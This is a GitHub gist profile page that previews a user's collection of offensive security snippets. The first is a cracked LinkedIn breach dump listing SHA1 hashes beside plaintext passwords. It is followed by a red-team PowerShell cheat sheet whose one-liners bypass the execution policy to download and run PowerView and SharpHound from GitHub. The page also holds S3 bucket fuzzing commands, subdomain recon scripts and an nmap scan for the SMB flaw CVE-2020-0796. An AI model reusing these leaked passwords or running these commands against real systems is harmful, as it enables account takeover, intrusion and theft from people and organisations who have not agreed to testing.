Skip to content

Instantly share code, notes, and snippets.

View secfb's full-sized avatar

Never Mind secfb

74 followers · 495 following
View GitHub Profile
@secfb
secfb / Linkedin1.6MCrackedSHA1.txt
Last active February 27, 2019 22:15 — forked from alanhamlett/Linkedin1.6MCrackedSHA1.txt
This file has been truncated, but you can view the full file.
41b5f9baa448533dfd513f4ed1753990f59cc613:workingknowledge
deb7be5e7ca96c5b317b8a0ee13045a00e22bab5:rafaebiel
c528cf77d9cdb4ea14b43aa62cf55044e25d3b4e:kunsitint
0cbcf09868e2ec6b856eee76e7e6a9201cc60ed0:zxcasdQWE!@#
413b6507e26f3fbe388f4f5bc1f5599ff85dec1c:siapatakut
708c503230bb9a2079696386f891899a7fc15ba5:FM95jd01
400945c2ea0fa0179adb232c882fd9d8dec90424:100Senh@
e7880b9ae185f66fdfcc80d71e61154ce705f4ab:om2sanji
d819838e7f3a3d37fdc8dcb5c5cf9409d32bfbaf:bc89mod47a
12ba813567f950658c0151e9b4d2e3dcdccc8d25:fredandleo
@secfb
secfb / RedTeam_CheatSheet.ps1
Created May 19, 2019 13:44 — forked from m8sec/RedTeam_CheatSheet.ps1
Collection of PowerShell one-liners for red teamers and penetration testers to use at various stages of testing.
# Domain Recon
## ShareFinder - Look for shares on network and check access under current user context & Log to file
powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerView/powerview.ps1');Invoke-ShareFinder -CheckShareAccess|Out-File -FilePath sharefinder.txt"
## Import PowerView Module
powershell.exe -exec Bypass -noexit -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerView/powerview.ps1')"
## Invoke-BloodHound for domain recon
powershell.exe -exec Bypass -C "IEX(New-Object Net.Webclient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/Ingestors/SharpHound.ps1');Invoke-BloodHound"
@secfb
secfb / domaincheck.sh
Created September 12, 2019 09:44
domaincheck.sh
#!/bin/bash
# Usage: ./domaincheck.sh subdomainfile.txt outputfile.txt
echo -e "[+] Domaincheck.sh by @CMD\n"
if [ -z "$1" ] || [ -z "$2" ]; then
echo "[!] Usage: ./converter.sh [domain-list-file] [output-file]"
exit 1
fi
echo "[+] Resolving domains to IPs..."
@secfb
secfb / allsubdomain.txt
Last active September 12, 2019 11:07
allsubdomain.txt
This file has been truncated, but you can view the full file.
-www
0
0-100
0-apastylecentral.apa.org.oak
0-chromosome
0-ebookcentral.proquest.com.millenium
0-eds.a.ebscohost.com.oasis
0-eds.a.ebscohost.com.oasis.lib
0-eds.b.ebscohost.com.library
0-eds.b.ebscohost.com.oak
@secfb
secfb / gist:63aa604c273c3f415ed04be0212f3d31
Created February 2, 2020 22:31 — forked from the-xentropy/gist:05ab1c5efd7ae7651b14e0fb85c6312c
Use wfuzz or ffuf to enumerate s3
Ffuf (faster):
ffuf -u "https://s3.REGION.amazonaws.com/COMPANYDELIMITERENVIRONMENT" -w "aws-regions.txt:REGION" -w "company.txt:COMPANY" -w "delimiters.txt:DELIMITER" -w "/usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt:ENVIRONMENT" -mc 200 -v
Wfuzz:
wfuzz -u "https://s3.FUZZ.amazonaws.com/FUZ2ZFUZ3ZFUZ4Z" -w aws-regions.txt -w company.txt -w delimiters.txt -w "/usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt" --sc 200 -v -t 50
The files:
@secfb
secfb / st8out.sh
Created February 18, 2020 22:11 — forked from dwisiswant0/st8out.sh
St8out - Extra one-liner for reconnaissance
#!/bin/bash
#####
#
# St8out - Extra one-liner for reconnaissance
#
# Usage: ./st8out.sh target.com
#
# Resources:
# - https://github.com/j3ssie/metabigor
@secfb
secfb / check-smb-v3.11.sh
Created March 11, 2020 17:21 — forked from nikallass/check-smb-v3.11.sh
CVE-2020-0796. Scan HOST/CIDR with nmap script smb-protocols.nse and grep SMB version 3.11.
#!/bin/bash
if [ $# -eq 0 ]
then
echo $'Usage:\n\tcheck-smb-v3.11.sh TARGET_IP_or_CIDR'
exit 1
fi
echo "Checking if there's SMB v3.11 in" $1 "..."
nmap -p445 --script smb-protocols -Pn -n $1 | grep -P '\d+\.\d+\.\d+\.\d+|^\|.\s+3.11' | tr '\n' ' ' | replace 'Nmap scan report for' '@' | tr "@" "\n" | grep 3.11 | tr '|' ' ' | tr '_' ' ' | grep -oP '\d+\.\d+\.\d+\.\d+'
@secfb
secfb / wahh_checklist.md
Last active May 31, 2020 09:40
wahh_checklist.md

Web Applicattion attack checklist

Recon and analysis

  • Map visible content
  • Discover hidden & default content
  • Test for debug parameters
  • Identify data entry points
  • Identify the technologies used
  • Map the attack surface
@secfb
secfb / firefox.sh
Created March 21, 2020 10:09 — forked from payloadartist/firefox.sh
Enumerate sub-domains, then open them in Firefox automatically. Useful for taking a quick glance at target's assets, and make notes, while doing recon.
# cat firefox.sh >> ~/.bashrc
# Usage - subf_ff target.tld
# asset_ff target.tld
subf_ff () {
subfinder -d $1 -silent - t 100 | httprobe -c 50 | sort -u | while read line; do firefox $line; sleep 10; done
}
asset_ff () {
assetfinder -subs-only $1 | httprobe -c 50 | sort -u | while read line; do firefox $line; sleep 10; done
@secfb
secfb / pasties.md
Created March 21, 2020 14:09
pasties.md 
       __________  _____    ____________________.______________ _________
       \______   \/  _  \  /   _____/\__    ___/|   \_   _____//   _____/
        |     ___/  /_\  \ \_____  \   |    |   |   ||    __)_ \_____  \ 
        |    |  /    |    \/        \  |    |   |   ||        \/        \
        |____|  \____|__  /_______  /  |____|   |___/_______  /_______  /
                        \/        \/                        \/        \/

Pasties